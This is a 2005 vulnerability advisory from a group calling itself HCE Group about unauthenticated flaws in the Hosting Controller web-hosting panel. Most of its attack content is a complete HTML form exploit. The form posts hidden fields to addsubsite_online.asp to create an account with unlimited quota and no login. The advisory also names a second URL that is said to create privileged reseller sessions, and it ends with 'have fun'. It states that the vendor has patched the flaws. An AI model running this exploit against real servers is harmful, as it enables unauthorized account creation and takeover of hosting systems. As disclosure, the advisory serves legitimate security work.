-= KeHieuHoc ? HCE GROUP =- Information ------------------------- Software Package : Hosting Controller Vendor Homepage : http://www.hostingcontroller.com Platforms : Windows based servers Vulnerability : Multiple Unauthenticated information disclose Risk : high Vulnerable Versions: All version ( Tested on: v.6.1 Hotfix 2.1 ) Vendor Contacted : 09/07/2005 Release Date: : 11/07/2005 Summary ------------ Hosting Controller is a complete array of Web hosting automation tools for the Windows Server family platform. (I) You can create new account on Hosting Controller Exploit : http://[target]/admin/hosting/addsubsite_online.asp Code Form: <FORM action="http://[target]/admin/hosting/addsubsite_online.asp"; method="post"> <INPUT type="hidden" name="domaintypecheck" value="SECOND" id="Hidden1"> Domain: <INPUT name="DomainName" value="hcegroup.net" id="Hidden2"><BR> Username: <INPUT name="loginname" value="kehieuhoc" id="Hidden3"><BR> <INPUT type="hidden" name="Quota" value="-1" id="Hidden4"> <INPUT type="hidden" name="htype" value="27" id="htype5" > <INPUT type="hidden" name="choice" value="1" id="Hidden6" > Password: <INPUT name="password" value="kehieuhoc" id="Hidden7"><BR><BR> <input type="submit" value="Make"> </FORM> (II) You can create any ?session? which it is special for owner system Exploit : http://[target]/admin/hosting/dsp_newreseller.asp (I) and (II) -> have fun Solution ---------- The vender was notified, they have released a patch. Update Your software Credits --------- Discovered on 9 July 2005 by KeHieuHoc ? HCE Group Email: kehieuhoc@xxxxxxxxx References ------------- http://hcegroup.net ------------------------------ // KeHieuHoc ? HCE Group \\ ------------------------------
